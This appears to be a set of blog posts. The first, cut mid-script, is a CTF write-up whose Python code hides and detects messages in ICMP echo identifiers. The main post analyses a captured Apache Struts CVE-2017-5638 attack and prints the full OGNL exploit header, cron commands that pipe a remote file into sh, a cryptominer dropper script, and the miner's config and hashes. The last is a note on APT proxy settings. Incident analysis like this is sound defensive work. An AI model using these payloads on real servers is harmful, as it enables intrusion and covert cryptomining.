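    return (raw[::-1] if backwards else raw).decode("latin-1")


def make_capture(message: str = "c0vert") -> List[bytes]:
    """Constructed capture: 192.168.1.8 sends the message backwards, two bytes
    per identifier, interleaved with 192.168.1.10's ordinary ping (fixed id)."""
    payload = message.encode("latin-1")[::-1]
    if len(payload) % 2:
        payload += b" "
    pkts = []
    for seq, off in enumerate(range(0, len(payload), 2), 1):
        ident = struct.unpack("!H", payload[off:off + 2])[0]
        pkts.append(build_echo("192.168.1.8", "192.168.1.10", ident, seq))
        pkts.append(build_echo("192.168.1.10", "192.168.1.8", 0x1234, seq))
    return pkts


if __name__ == "__main__":
    capture = make_capture()
    for host in ("192.168.1.8", "192.168.1.10"):
        ids = echo_ids_from(capture, host)
        print(host, [hex(i) for i in ids], "covert" if looks_like_covert_channel(ids) else "normal")
    print("reassembled:", ids_to_text(echo_ids_from(capture, "192.168.1.8")))
```

    To use it on the challenge file, export the ICMP packets with a raw-IP link type (or strip the Ethernet header first) and feed the packet bytes to echo_ids_from.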

    Shell hiding in image files

    One day, we noticed a strange GET request towards our JBoss server:

    GET /login.action   HTTP/1.1
    Host: X.X.X.X
    Connection: keep-alive 
    Accept-Encoding: gzip, deflate 
    Accept: */* 
    User-Agent: Mozilla/5.0 
    Content-Type: %{(#_='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "48 * * * * wget -O - -q http://91.230.47.41/pics/logo.jpg|sh\n18 * * * * curl http://91.230.47.41/pics/logo.jpg|sh" | crontab -').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())} 

    From the request above, you’ll quickly notice that this attack leverages the Apache Struts vulnerability CVE-2017-5638.

    The request tried to execute the command below:

    #cmd='echo "48 * * * * wget -O - -q http://91.230.47.41/pics/logo.jpg|sh\n18 * * * * curl http://91.230.47.41/pics/logo.jpg|sh" | crontab -'

    “-O” : write the documents to the given file.
    “-” : when given as the file, the documents are printed to standard output (and link conversion is disabled).
    “-q” : quiet (no output).

    As you can see, it tried to fetch an image (a jpeg file) from 91.230.47.41. Seems normal, right?
    We fetched the file and took a look at the jpg:

    [email protected]:~/a# file logo.jpg
    logo.jpg: POSIX shell script, ASCII text executable

    ASCII?? Not JPEG?? Hmm..
    Here’s what’s inside the “logo.jpg” file:

    [email protected]:~/a# cat logo.jpg
    #!/bin/sh
    rm -rf /tmp/systemd-logind
    rm -rf /tmp/logind.conf
    rm -rf /tmp/kworker
    rm -rf /tmp/kworker.conf
    rm -rf /tmp/kauditd.conf
    pkill -f stratum
    pkill -f "/tmp/apache"
    pkill -f "/tmp/httpd.conf"
    pkill -f cryptonight
    pkill -f qivtpwwuxs
    ps auxf|grep -v grep|grep -v smzgmilpdo|grep "/tmp/"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "\./"|grep 'httpd.conf'|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "\-p x"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "qivtpwwuxs"|awk '{print $2}'|xargs kill -9
    ps -fe|grep smzgmilpdo|grep -v grep
    if [ $? -ne 0 ]
    then
    echo "start process....."
    chmod 777 /tmp/smzgmilpdo.conf
    rm -rf /tmp/smzgmilpdo.conf
    curl -o /tmp/smzgmilpdo.conf http://91.230.47.41/pics/kworker.conf
    wget -O /tmp/smzgmilpdo.conf http://91.230.47.41/pics/kworker.conf
    chmod 777 /tmp/kauditd
    rm -rf /tmp/kauditd
    cat /proc/cpuinfo|grep aes>/dev/null
    if [ $? -ne 1 ]
    then
    curl -o /tmp/kauditd http://91.230.47.41/pics/kworker
    wget -O /tmp/kauditd http://91.230.47.41/pics/kworker
    else
    curl -o /tmp/kauditd http://91.230.47.41/pics/kworker_na
    wget -O /tmp/kauditd http://91.230.47.41/pics/kworker_na
    fi
    chmod +x /tmp/kauditd
    cd /tmp
    proc=`grep -c ^processor /proc/cpuinfo`
    cores=$((($proc+1)/2))
    nohup ./kauditd -c smzgmilpdo.conf -t `echo $cores` >/dev/null &
    else
    echo "runing....."
    fi

    We noticed several other files being fetched: possibly a config file and a binary.
    Let’s fetch those files!

    Here is the config file:
    http://91.230.47.41/pics/kworker.conf

    {
        "url" : "stratum+tcp://212.129.44.157:80",
        "url" : "stratum+tcp://212.129.46.87:80",
        "url" : "stratum+tcp://212.129.44.156:80",
        "url" : "stratum+tcp://212.129.46.191:80",
        "url" : "stratum+tcp://62.210.29.108:80",
        "url" : "stratum+tcp://212.83.129.195:80",
        "url" : "stratum+tcp://212.129.44.155:80",
        "user" : "466iRjZzJZZWAqzV24ywY8XMVNkp9hj8UJiBEf61Eui6Nw8bEAJ1z434LWM3SKdaDyH7zgNY64rgg2fYmw8cbP5uBjpMA8g",
        "pass" : "x",
        "algo" : "cryptonight",
        "quiet" : true
    }

    Not sure what it is. Maybe a binary to run as a process:
    http://91.230.47.41/pics/kworker

    [email protected]:~/91.230.47.41# file kworker
    kworker: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, stripped

    Let’s see if the file is packed:

    [email protected]:~/91.230.47.41# upx -l kworker
                           Ultimate Packer for eXecutables
                              Copyright (C) 1996 - 2011
    UPX 3.08        Markus Oberhumer, Laszlo Molnar & John Reiser   Dec 12th 2011
    
            File size         Ratio      Format      Name
       --------------------   ------   -----------   -----------
       2979640 ->   1217152   40.85%  linux/ElfAMD   kworker

    Yup. So let’s unpack the file using UPX:

    [email protected]:~/91.230.47.41# upx -d kworker
                           Ultimate Packer for eXecutables
                              Copyright (C) 1996 - 2011
    UPX 3.08        Markus Oberhumer, Laszlo Molnar & John Reiser   Dec 12th 2011
    
            File size         Ratio      Format      Name
       --------------------   ------   -----------   -----------
       2980813 <-   1217152   40.83%  linux/ElfAMD   kworker
    
    Unpacked 1 file.
    
    [email protected]:~/91.230.47.41# upx -l kworker
                           Ultimate Packer for eXecutables
                              Copyright (C) 1996 - 2011
    UPX 3.08        Markus Oberhumer, Laszlo Molnar & John Reiser   Dec 12th 2011
    
            File size         Ratio      Format      Name
       --------------------   ------   -----------   -----------
    upx: kworker1: NotPackedException: not packed by UPX

    http://91.230.47.41/pics/kworker_na

    [email protected]:~/91.230.47.41# file kworker_na
    kworker_na: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.32, BuildID[sha1]=0x0eedc33c49aeb80818a839a9b23cf159c710e443, stripped
    
    [email protected]:~/91.230.47.41# upx -l kworker_na
                           Ultimate Packer for eXecutables
                              Copyright (C) 1996 - 2011
    UPX 3.08        Markus Oberhumer, Laszlo Molnar & John Reiser   Dec 12th 2011
    
            File size         Ratio      Format      Name
       --------------------   ------   -----------   -----------
    upx: kworker_na: NotPackedException: not packed by UPX

    Overall, it looks like the attacker wanted to hack our servers and turn them into his own cryptocurrency mining machines.
    Typical attack behaviour these days, while cryptocurrency prices are rising: people hack to make a profit. 🙂

    Here are the MD5s for the files above:

    211e98ac0686fe98d06570ad0689e9b3  logo.jpg
    d2a01b844521fb141b8449f4d8e1c821  kworker.conf
    483b322b42835227d98f523f9df5c6fc  kworker (upx packed)
    4fa4269b7ce44bfce5ef574e6a37c38f  kworker (upx unpacked)
    131df88b7d0b3e7a1c4d84c37e71fb60  kworker_na

    Configuring proxy for APT in Ubuntu

    Recently I had a problem where, when I tried to update Ubuntu packages via apt-get, it showed an HTTP 401 proxy-related error.
    Just a note: I’m running the VM on my office network, which has proxy servers.

    From this site:

    APT configuration file method
    This method uses the apt.conf file which is found in your /etc/apt/ directory. This method is useful if you only want apt-get (and not other applications) to use a http-proxy permanently.
    On some installations there will be no apt-conf file set up. This procedure will either edit an existing apt-conf file or create a new apt-conf file.
    gksudo gedit /etc/apt/apt.conf
    Add this line to your /etc/apt/apt.conf file (substitute your details for yourproxyaddress and proxyport).
    Acquire::http::Proxy "http://username:password@yourproxyaddress:proxyport";
    Save the apt.conf file.

    References :
    http://askubuntu.com/questions/257290/configure-proxy-for-apt
    http://askubuntu.com/questions/543616/why-does-add-apt-repository-now-fail-to-retrieve-keys-behind-my-proxy-server-bu